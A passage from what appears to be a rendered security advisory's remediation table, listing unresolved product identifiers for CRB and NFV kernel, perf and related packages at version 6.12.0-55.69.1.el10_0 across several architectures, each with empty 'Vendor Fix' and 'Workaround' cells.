| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
